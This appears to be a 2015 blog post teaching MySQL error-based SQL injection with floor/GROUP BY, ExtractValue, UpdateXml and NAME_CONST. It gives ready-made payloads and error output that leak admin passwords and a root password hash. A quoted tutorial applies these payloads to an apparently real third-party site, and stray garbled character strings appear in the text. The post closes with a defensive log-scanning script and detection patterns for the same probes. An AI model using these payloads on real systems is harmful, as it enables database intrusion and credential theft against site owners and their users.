
MySQL error-based injection: exploiting the floor, ExtractValue and UpdateXml error modes

Posted on 2015-11-11 19:03:37

1. Errors via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is leaked through the error message. To retrieve other data, replace the version() expression in the statement with the query you want.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'



Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injecting with NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column 1 error...
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here, if it does, we can go on and finish the job.- ^- o( L$ A6 Y# R4 |: w' A  i
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...+ I2 F* w. f" m: L. ]

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
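An added detection example (my own code, not from the original post or the quoted tutorial): it scans constructed web-server access-log lines for the four error-based probe shapes covered above (floor(rand(0)*2) with GROUP BY, ExtractValue, UpdateXml, and the doubled NAME_CONST), decoding each query string first so that the '+' and '%20' spellings seen on this page are treated alike. The log lines, client IPs and script paths are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the original post). The
# query strings carry the probes discussed above, URL-encoded as a web
# server would log them; the last line is a benign request for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [11/Nov/2015:19:04:01 +0800] "GET /article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 231
10.0.0.7 - - [11/Nov/2015:19:04:09 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 198
10.0.0.7 - - [11/Nov/2015:19:04:15 +0800] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x3a,(select%20user())),1)) HTTP/1.1" 500 201
10.0.0.9 - - [11/Nov/2015:19:05:00 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 240
10.0.0.5 - - [11/Nov/2015:19:06:12 +0800] "GET /search.php?q=floor+plans HTTP/1.1" 200 900
"""

# One signature per technique on the page, matched against the decoded query
# string; floor needs rand(0)*2 plus GROUP BY, NAME_CONST must appear twice.
SIGNATURES = {
    "floor_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "name_const": re.compile(r"\bname_const\s*\(.*\bname_const\s*\(", re.I | re.S),
}

# Common log format: client IP, then the quoted request line and status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

def decode_query(url):
    """Return the decoded query string of a logged request URL."""
    query = urllib.parse.urlsplit(url).query
    # unquote_plus maps both '+' and '%20' to a space, so payloads written
    # either way (both spellings appear on the page) normalise the same.
    return urllib.parse.unquote_plus(query)

def scan_log(text):
    """Return (ip, status, technique) for each request matching a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decode_query(m.group("url"))
        for name, pattern in SIGNATURES.items():
            if pattern.search(query):
                hits.append((m.group("ip"), int(m.group("status")), name))
    return hits

if __name__ == "__main__":
    for ip, status, technique in scan_log(SAMPLE_LOG):
        print(f"{ip}  HTTP {status}  error-based probe: {technique}")
```

Pairing these hits with 500 responses is a useful second signal, since each technique only works when the database error reaches the client; the fix on the application side is to bind id as an integer parameter and never echo the raw MySQL error.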
